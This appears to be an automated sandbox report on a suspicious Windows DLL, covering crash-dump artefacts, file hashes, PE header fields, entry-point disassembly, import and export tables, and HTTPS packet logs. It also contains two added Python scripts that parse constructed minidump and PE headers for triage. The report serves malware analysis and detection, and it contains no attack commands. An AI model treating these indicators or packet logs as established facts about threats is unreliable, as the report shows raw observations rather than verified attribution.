                                                                                                                        Preview: MDMP....... ........da...................U...........B..............GenuineIntelW...........T.......@...`.da!............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6984.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8416
                                                                                                                        Entropy (8bit):3.697753685979791
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi926o6jYy6Yoy6xgmf8zSNz+prfZ89bYbasfyejm:RrlsNis6o6jYy6Y96xgmf8zSNpYb5fL6
                                                                                                                        MD5:BADE93E59CD5720AB99E2508033FE2BB
                                                                                                                        SHA1:9257D92BE814163ED9D6E71DC5F282D0377CD90D
                                                                                                                        SHA-256:E0576D35FA22FA6525FED18862A5C4D3FEF0A7DDA9ABA2DD711D994276920D3C
                                                                                                                        SHA-512:5A8B6AE760691632CBF5B4D45DC7E9DDBA241701D9C2D018A106BB338FCCA751E73FCF7FC789E9AD8C4745FA6D464E7050176AC96293F752BA48C24A4042FF07
                                                                                                                        Malicious:false
                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.d.>.......
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E67.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486306505900062
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2Q8fm8M4JCdsTMFMDGv+q8vjsTv4SrSld:uITf9EqSN0tJNYvKivDWld
                                                                                                                        MD5:139252536DD735CAA02910CCEF45FF77
                                                                                                                        SHA1:B5EA76ED280C8826367FF09C33596FBD7E73E301
                                                                                                                        SHA-256:D78ACA3358C19DB67E52384ED6AEE82B755A321E0E5963312DBDE4B5DFD8C370
                                                                                                                        SHA-512:5BC27230DB2D3272AD98C0DFE3BB0BA29425ED587B6909065F635691F54F9B0A282092D6970FA70DD72D9A93ADAA3CD7691B1604ADD93176B25CCAEA6EF0EA19
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
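The WerFault artefacts above are what the "One or more processes crash" signature rests on, and the file-type line for each `.dmp` ("Mini DuMP crash report, 15 streams, ..., 0x1205a4 type") is just the minidump header decoded. The following is an added example, not part of the sandbox report or its tooling, showing how to read that header and the stream directory yourself and to turn the raw `0x1205a4` type word into MINIDUMP_TYPE flag names. The dump bytes are constructed in the script (three placeholder streams, the flags and time from the listing); they are not the WerFault output listed above.

```python
"""Decode a Windows minidump header and stream directory.

Added example for this page, not code from the sandbox report.  The
dump parsed here is CONSTRUCTED by build_sample_dump(); only the flags
word and timestamp are taken from the listing above."""
import struct
from datetime import datetime, timezone

MINIDUMP_SIGNATURE = 0x504D444D  # 'MDMP' read as a little-endian u32
MINIDUMP_VERSION = 0xA793        # low 16 bits of the Version field

STREAM_TYPES = {  # MINIDUMP_STREAM_TYPE values from dbghelp.h (subset)
    3: "ThreadListStream", 4: "ModuleListStream", 5: "MemoryListStream",
    6: "ExceptionStream", 7: "SystemInfoStream", 9: "Memory64ListStream",
    12: "HandleDataStream", 14: "UnloadedModuleListStream", 15: "MiscInfoStream",
    16: "MemoryInfoListStream", 17: "ThreadInfoListStream", 19: "TokenStream",
}

MINIDUMP_TYPE = {  # MINIDUMP_TYPE bits from dbghelp.h
    0x00000001: "MiniDumpWithDataSegs",
    0x00000002: "MiniDumpWithFullMemory",
    0x00000004: "MiniDumpWithHandleData",
    0x00000008: "MiniDumpFilterMemory",
    0x00000010: "MiniDumpScanMemory",
    0x00000020: "MiniDumpWithUnloadedModules",
    0x00000040: "MiniDumpWithIndirectlyReferencedMemory",
    0x00000080: "MiniDumpFilterModulePaths",
    0x00000100: "MiniDumpWithProcessThreadData",
    0x00000200: "MiniDumpWithPrivateReadWriteMemory",
    0x00000400: "MiniDumpWithoutOptionalData",
    0x00000800: "MiniDumpWithFullMemoryInfo",
    0x00001000: "MiniDumpWithThreadInfo",
    0x00002000: "MiniDumpWithCodeSegs",
    0x00004000: "MiniDumpWithoutAuxiliaryState",
    0x00008000: "MiniDumpWithFullAuxiliaryState",
    0x00010000: "MiniDumpWithPrivateWriteCopyMemory",
    0x00020000: "MiniDumpIgnoreInaccessibleMemory",
    0x00040000: "MiniDumpWithTokenInformation",
    0x00080000: "MiniDumpWithModuleHeaders",
    0x00100000: "MiniDumpFilterTriage",
}


def parse_minidump(data):
    """Return header fields and the stream directory of a minidump blob."""
    # MINIDUMP_HEADER (32 bytes): Signature, Version, NumberOfStreams,
    # StreamDirectoryRva, CheckSum, TimeDateStamp, Flags (u64)
    sig, version, nstreams, dir_rva, _checksum, timestamp, flags = \
        struct.unpack_from("<IIIIIIQ", data, 0)
    if sig != MINIDUMP_SIGNATURE:
        raise ValueError("not a minidump (bad signature)")
    if version & 0xFFFF != MINIDUMP_VERSION:
        raise ValueError("unexpected MINIDUMP_VERSION")
    streams = []
    for i in range(nstreams):
        # MINIDUMP_DIRECTORY (12 bytes): StreamType, Location.DataSize, Location.Rva
        stype, size, rva = struct.unpack_from("<III", data, dir_rva + 12 * i)
        if rva + size > len(data):  # truncated or hostile dump: do not trust the RVA
            raise ValueError(f"stream {i} points outside the file")
        streams.append((STREAM_TYPES.get(stype, f"Unknown({stype})"), size, rva))
    return {
        "streams": streams,
        "time_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc)
                            .strftime("%a %b %d %H:%M:%S %Y UTC"),
        "flags": flags,
        "flag_names": [n for b, n in sorted(MINIDUMP_TYPE.items()) if flags & b],
        "unknown_flag_bits": flags & ~sum(MINIDUMP_TYPE),
    }


def build_sample_dump():
    """CONSTRUCTED three-stream dump: flags 0x1205a4 and the 2021-10-11
    22:37:57 UTC timestamp mirror the listing; stream bodies are zero
    placeholders, not real MINIDUMP_* structures."""
    nstreams, dir_rva = 3, 32
    data_rva = dir_rva + 12 * nstreams
    payloads = [(7, b"\0" * 56), (6, b"\0" * 168), (3, b"\0" * 4)]
    directory, body = b"", b""
    for stype, blob in payloads:
        directory += struct.pack("<III", stype, len(blob), data_rva + len(body))
        body += blob
    header = struct.pack("<IIIIIIQ", MINIDUMP_SIGNATURE, MINIDUMP_VERSION,
                         nstreams, dir_rva, 0, 1633991877, 0x1205A4)
    return header + directory + body


if __name__ == "__main__":
    info = parse_minidump(build_sample_dump())
    print(info["time_utc"], hex(info["flags"]))
    for name, size, rva in info["streams"]:
        print(f"  {name:28s} size={size:6d} rva=0x{rva:x}")
    print("  flags:", ", ".join(info["flag_names"]))
```

Applied to the real `WER*.tmp.dmp` files, the same parser reports which streams are present (an ExceptionStream means the dump records a fault, the SystemInfoStream carries the OS build) and whether the `0x1205a4` type is the usual WER triage shape (MiniDumpFilterTriage, MiniDumpWithoutOptionalData and friends, i.e. no full memory). Bounds-check every RVA before following it: a crash dump dropped by malware is untrusted input like any other.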

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):6.669952151971332
                                                                                                                        TrID:
                                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:616412739e268.dll
                                                                                                                        File size:718336
                                                                                                                        MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                        SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                        SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                        SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                        SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m$aV.J2V.J2V.J2...2U.J2_t.2H.J2.cH3R.J2.cO3_.J2.cI3D.J2...2H.J2V.K2..J2.cO3).J2.cJ3W.J2.cJ3W.J2V..2W.J2.cH3W.J2RichV.J2.......

                                                                                                                        File Icon

                                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x1003ab77
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x10000000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                        Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:b5c6badd398e2e3aa283a40a40432c6c
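Every field in the table above comes straight out of the PE headers: the entry point is an RVA (0x3ab77) added to the image base (0x10000000), the time stamp is a 32-bit Unix epoch, and the two characteristics rows are bit masks. The script below is an added example, not part of the sandbox report or its tooling, that decodes those fields from a PE32 header and normalises an import list into the string the common import hash (imphash) is the MD5 of. The header bytes are constructed in the script from the values in the table, not read from the analysed DLL; the import list is likewise constructed, so the hash it produces is not the sample's import hash. The ordinal-to-name lookup that pefile applies for ws2_32 and oleaut32 is omitted here.

```python
"""PE32 header triage: entry point, image base, link time, characteristics
flags, plus an imphash over a parsed import list.

Added example for this page, not code from the sandbox report.  The header
parsed here is CONSTRUCTED by build_sample_header() from the report's
static PE fields; it is not the analysed binary."""
import hashlib
import struct
from datetime import datetime, timezone

IMAGE_FILE_CHARACTERISTICS = {  # IMAGE_FILE_* bits (subset)
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
DLL_CHARACTERISTICS = {  # IMAGE_DLLCHARACTERISTICS_* bits
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe_header(data):
    """Decode the DOS stub pointer, IMAGE_FILE_HEADER and PE32 optional header."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    fh = e_lfanew + 4  # IMAGE_FILE_HEADER, 20 bytes
    machine, nsections, timestamp, _, _, opt_size, chars = \
        struct.unpack_from("<HHIIIHH", data, fh)
    oh = fh + 20       # IMAGE_OPTIONAL_HEADER32
    magic, = struct.unpack_from("<H", data, oh)
    if magic != 0x10B:
        raise ValueError("only PE32 (0x10B) handled; 0x20B is PE32+")
    entry_rva, = struct.unpack_from("<I", data, oh + 16)
    image_base, = struct.unpack_from("<I", data, oh + 28)
    os_major, os_minor = struct.unpack_from("<HH", data, oh + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, oh + 68)
    return {
        "machine": machine,
        "sections": nsections,
        "link_time_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc)
                                 .strftime("%a %b %d %H:%M:%S %Y UTC"),
        "characteristics": flag_names(chars, IMAGE_FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "entry_rva": entry_rva,
        "image_base": image_base,
        "entry_va": image_base + entry_rva,  # what the report prints as Entrypoint
        "os_version": f"{os_major}.{os_minor}",
        "subsystem": subsystem,              # 2 = WINDOWS_GUI, 3 = WINDOWS_CUI
    }


def imphash_input(imports):
    """Normalise (dll, name, ordinal) triples the way imphash does: lower-case,
    .dll/.ocx/.sys stripped, ordinals as ordN, joined with commas in table order."""
    parts = []
    for dll, name, ordinal in imports:
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if dll.endswith(ext):
                dll = dll[:-len(ext)]
                break
        func = name.lower() if name else f"ord{ordinal}"  # no ws2_32/oleaut32 ordinal lookup here
        parts.append(f"{dll}.{func}")
    return ",".join(parts)


def imphash(imports):
    return hashlib.md5(imphash_input(imports).encode("ascii")).hexdigest()


def build_sample_header():
    """CONSTRUCTED PE32 header carrying the table's values: i386 DLL, entry RVA
    0x3ab77 at base 0x10000000, timestamp 0x5F700BB2, GUI subsystem,
    DYNAMIC_BASE|NX_COMPAT.  Not the real sample."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    file_header = struct.pack("<HHIIIHH", 0x14C, 5, 0x5F700BB2, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, 0x3AB77)
    struct.pack_into("<I", opt, 28, 0x10000000)
    struct.pack_into("<HH", opt, 40, 6, 0)
    struct.pack_into("<HH", opt, 68, 2, 0x0140)
    return bytes(dos) + b"PE\0\0" + file_header + bytes(opt)


if __name__ == "__main__":
    for k, v in parse_pe_header(build_sample_header()).items():
        print(f"{k:20s} {hex(v) if isinstance(v, int) else v}")
```

Two checks worth running on any sample, not only this one: compare the decoded link time against the first-seen date of the file (a build stamp days before the sandbox run is ordinary; one years out, or in the future, is a hint it was forged), and confirm that `entry_va` falls inside an executable section before reading an "Entrypoint Preview" such as the one below, since a pointer into a non-code section is itself a signal.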

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                                        jne 00007F9CC8990D67h
                                                                                                                        call 00007F9CC8991852h
                                                                                                                        push dword ptr [ebp+10h]
                                                                                                                        push dword ptr [ebp+0Ch]
                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                        call 00007F9CC8990C0Ah
                                                                                                                        add esp, 0Ch
                                                                                                                        pop ebp
                                                                                                                        retn 000Ch
                                                                                                                        mov ecx, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], ecx
                                                                                                                        pop ecx
                                                                                                                        pop edi
                                                                                                                        pop edi
                                                                                                                        pop esi
                                                                                                                        pop ebx
                                                                                                                        mov esp, ebp
                                                                                                                        pop ebp
                                                                                                                        push ecx
                                                                                                                        ret
                                                                                                                        mov ecx, dword ptr [ebp-10h]
                                                                                                                        xor ecx, ebp
                                                                                                                        call 00007F9CC8990963h
                                                                                                                        jmp 00007F9CC8990D40h
                                                                                                                        mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007F9CC8990952h
jmp 00007F9CC8990D2Fh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [100AA0D4h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [100AA0D4h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0xa8990          0x80          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa8a10          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x146000         0x53d0        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0xa474c          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0xa47a0          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7b000          0x1fc         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x79f71       0x7a000   False     0.510071801358   data       6.75463290974  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7b000          0x2e586       0x2e600   False     0.556366871631   data       5.60181106954  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xaa000          0x9b19c       0x1800    False     0.190266927083   data       4.15778005426  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x146000         0x53d0        0x5400    False     0.752650669643   data       6.72453697464  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL           Import
KERNEL32.dll  LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
USER32.dll    CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
MSACM32.dll   acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

Exports

Name        Ordinal  Address
BeGrass     1        0x10016020
Fieldeight  2        0x100162f0
Often       3        0x10016510
Townenter   4        0x100167a0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Oct 12, 2021 00:38:03.252177954 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:03.252216101 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:03.252338886 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:03.260545015 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:03.260579109 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:03.587343931 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:03.587502956 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:03.591922045 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:03.591939926 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:03.592248917 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:03.643688917 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:04.786664009 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:04.831147909 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:04.901016951 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:04.901099920 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:04.901241064 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:05.055090904 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:05.055150986 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:05.055206060 CEST  49776        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:05.055217981 CEST  443          49776      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:10.938795090 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:10.938858986 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:10.939007044 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:10.944888115 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:10.944916010 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.257594109 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.257904053 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:11.262480021 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:11.262511015 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.262924910 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.316159964 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:11.595365047 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:11.639143944 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.709975958 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.710064888 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.710170031 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:11.710742950 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:11.710772991 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:11.710854053 CEST  49779        443        192.168.2.4    13.82.28.61
Oct 12, 2021 00:38:11.710865021 CEST  443          49779      13.82.28.61    192.168.2.4
Oct 12, 2021 00:38:45.900778055 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:45.900826931 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:45.901609898 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:45.902388096 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:45.902405977 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.422904015 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.423059940 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:46.426368952 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:46.426393032 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.426701069 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.430068970 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:46.471141100 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.600647926 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.600722075 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.600783110 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:46.601516008 CEST  49806        443        192.168.2.4    40.97.116.82
Oct 12, 2021 00:38:46.601542950 CEST  443          49806      40.97.116.82   192.168.2.4
Oct 12, 2021 00:38:46.635039091 CEST  49807        443        192.168.2.4    52.97.183.162
